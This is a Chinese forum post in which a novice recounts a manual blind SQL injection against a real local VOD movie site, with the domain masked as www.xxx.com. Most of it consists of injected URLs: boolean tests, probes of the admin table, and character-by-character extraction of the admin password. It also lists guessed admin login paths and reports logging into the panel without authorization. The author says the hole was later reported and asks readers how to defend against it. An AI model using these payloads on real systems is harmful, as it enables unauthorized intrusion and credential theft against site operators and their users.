首先下載:09月21日的SQL注入技術實例講解,打開后是網頁形式的,看過一次以后拿某網站VOD視頻做了一下測試。
首先引用一下教程里的話:“SQL injection可以說是一種漏洞,也可以說成是一種攻擊方法,程序中的變量處理不當,對用戶提交的數據過濾不足,都可能產生這個漏洞,而攻擊原理就是利用用戶提交或可修改的數據,把想要的SQL語句插入到系統實際SQL語句中,輕則獲得敏感的信息,重則控制服務器。SQL injection并不緊緊局限在Mssql數據庫中,Access、Mysql、Oracle、Sybase都可以進行SQL injection攻擊。 在大多數ASP站點中,我們并不知道其程序代碼,靠任何掃描器也不可能發現SQL injection漏洞,這時就要靠手工檢測了,由于我們執行SQL語句要用到單引號、分號、逗號、冒號和“--”,所以我們就在可修改的URL后加上以上符號,或在表單中的文本框加上這些符號 ”
尋找目標,我尋找到了,這里就用www.xxx.com代替吧。
打開一個電影地址,www.xxx.com/film/show.asp?id=271
測試一下www.xxx.com/film/show.asp?id=271 and 1=1
打開了??這步應該是測試可不可以用SQL注入攻擊的一個驗證吧,(不過我試的那個網站是可以SQL注入攻擊的,我到不知道不可以SQL注入攻擊會返回什么值)
www.xxx.com/film/show.asp?id=271and 1=2沒打開(在教程里面這個寫成了_blank>http://www.bofei.net/film/show.asp?id=271?adn 1=2 希望管理員如果看到的話請改一下~~)
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin)這一步是查看是否存在ADMIN列表的,測試以后打開,說明ADMIN列表存在
根據教程測試,測試密碼,www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where len(username)>5) 打不開,連接錯誤,后來跟教程一樣試了8,結果也是錯誤,后來直接圖方便把8改成了6,嘿嘿,還是錯誤,為啥?因為是>而不是=,后來試了幾次都沒有打開。郁悶了,想,是在哪出錯的?后來從新看了一次教程,并把命令粘到了文本文檔做比較,哦,原來應該是=,
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where len(username)=6)
試了一下=以后,結果打開了,說明ADMIN的密碼=6位?繼續下一步。
猜測用戶名
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,1)=''1'')
直接套這步,沒打開,后來苦思N久, 沒看懂教程里面的意思,哎,先放著,繼續下一步。
尋找站長的名字,當時還是沒大看懂這句,網站上N多地方都沒有網站站長的名字之類的,繼續下一步。
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,6)=''13月32日'')
我試了次,當然打不開,2個站的站點ADMIN怎么能一樣內,嘿嘿。當時沒有理解這個的意思,我又繼續了下一步。我雖然不理解這句的意思,但是我稍微知道,13月32日,就是站長的ID,(username,6)就是站長的名字=6位長的意思。(不知道這樣理解對不對呀如果不對請指出)
猜測密碼,www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,6)=''100200'')
這步他直接猜測完了,他的密碼是6位數,然后密碼是100200,這步的步驟。
第1步應該猜測第1位數的密碼,
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,1)=''1'')
''1''?應該把這個''''號里的1,從0-9,A-Z試一次,如果失敗,會打不開,直到成功了,就會正打開,而且沒有錯誤提示。這句我只能理解括號里面的,(password,1)=''1'')這句理解成: 密碼的第1位數=1
試完第1個密碼該試第2個密碼了,
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,2)=''10'')
因為我已經站點第1個密碼是1了所以不用動第1位數了,這次也是從0-9,A-Z試一次,這步完了就該第3步了,
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,3)=''100'')
依次第6步就應該是
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,6)=''100200'')
因為先前已經知道他的密碼長度是6位了,然后他的管理員ID也依照這個方法來查
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,1)=''1'')
(username,1)=''1'') 這句理解成:第1個名字的是:1
依次查出管理員名稱,
pass:如果管理員名字改成漢字,那半年也猜不錯吧?不知道能不能用漢字?:(
試出管理員密碼,然后試登陸頁面,3個地址
www.xxx.com/film/adminlogin.asp
www.xxx.com/film/login.asp
www.xxx.com/film/admin/login.asp
大概會應該有一個能進入的,然后用你剛才查到的管理員ID和PASSWORD進入。
好了,可以隨意瀏覽了,我進入了一下,沒什么好看的,我自己也有自己的站點,我要想看,自己下一個看算了,而且我和這個網站的管理員關系很好,如果我想看里面的電影,他會傳到開設到我帳戶的FTP里,然后我自己下載就可以看了,所以我已經把這個漏洞告訴他了,剩下的就是他們的辦法了,由于偶還是菜菜,偶不會清楚自己的PP,55,我也很誠實的告訴了他,而且我也沒動里面任何客戶的資料,沒添加任何一個客戶的時間卡,我想我這個善意的舉動,他們不會對我做什么懲罰吧?(第1次做這個事,不知道能不能算的上hacker的舉動,我沒用任何工具,全靠手慢慢猜的)如果他們懲罰我我可就完了,這個VOD視頻網站的上頭,就是我們當地的寬帶公司,我們這里只有電信和網通2家,電信是剛起家的接入的地方比較少,網通給我停網了,恐怕以后我就不能在家上網了,555。
這個方法,現在能成功的ASP電影網站恐怕很少了,因為我們這里相對網絡技術比較落后一些,他們的網絡安全觀念比較淡薄,所以這次還是會很順利的進入了他們的電影網站,我想如果他們進入數據庫里,類似做論壇一樣,隨便改幾個數據庫中的連接,就可以直接解決這個問題了,起碼你沒有他服務器的權限,你就不知道他的ADMIN管理進口在哪。
也希望各位高手說一下,就當幫小的一個忙,如果象我說的那種情況,有什么方法可以阻止別人象我這樣利用SQL攻擊而獲得ADMIN帳號?會的請跟貼說一下,謝謝了。(別叫人整個ASP都刪掉喲)??
希望各位高手大大都把自己第1次覺得自己做的成功的事,發上來,對于新手的學習,會起到很大的作用的。
